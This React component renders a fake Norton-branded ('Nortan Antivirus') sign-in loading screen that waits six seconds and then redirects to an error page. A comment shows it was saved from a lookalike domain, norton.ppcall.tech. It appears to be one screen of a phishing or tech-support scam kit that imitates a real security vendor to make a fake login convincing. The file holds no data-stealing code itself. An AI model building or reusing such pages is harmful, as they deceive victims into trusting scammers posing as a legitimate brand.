import { useEffect } from "react";
import { useNavigate } from "react-router-dom";

const Load = () => {
  const navigate = useNavigate();

  useEffect(() => {
    const timer = setTimeout(() => {
      navigate("/error");
    }, 6000);

    // Cleanup the timeout on unmount
    return () => clearTimeout(timer);
  }, [navigate]);

  return (
    <div>
      {/* saved from url=(0038)https://norton.ppcall.tech/signing.php */}
      <meta httpEquiv="Content-Type" content="text/html; charset=UTF-8" />
      <meta httpEquiv="refresh" content="" />
      <meta name="viewport" content="width=device-width, initial-scale=1" />
      {/* The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags */}
      <meta name="description" content />
      <meta name="author" content />
      <title>Nortan Antivirus</title>
      <style
        type="text/css"
        dangerouslySetInnerHTML={{
          __html:
            "\n      .loading-img {\n        margin-left: -105px;\n        position: absolute;\n        top: 10%;\n        left: 50%;\n        text-align: center;\n        height: 420px;\n        width: 210px;\n      }\n      h3 {\n      \tfont-weight: 300;\n      \tfont-size: 20px;\n      }\n    ",
        }}
      />
      <div className="loading-img">
        <h3>Signing into Your account </h3>
        <img src="./nortonlogo1.jpg" alt="logo" style={{ display: "block" }} />
        <img
          src="./ajax-loader-big.gif"
          alt="loading"
          style={{ display: "block" }}
        />
        please wait...
      </div>
    </div>
  );
};

export default Load;
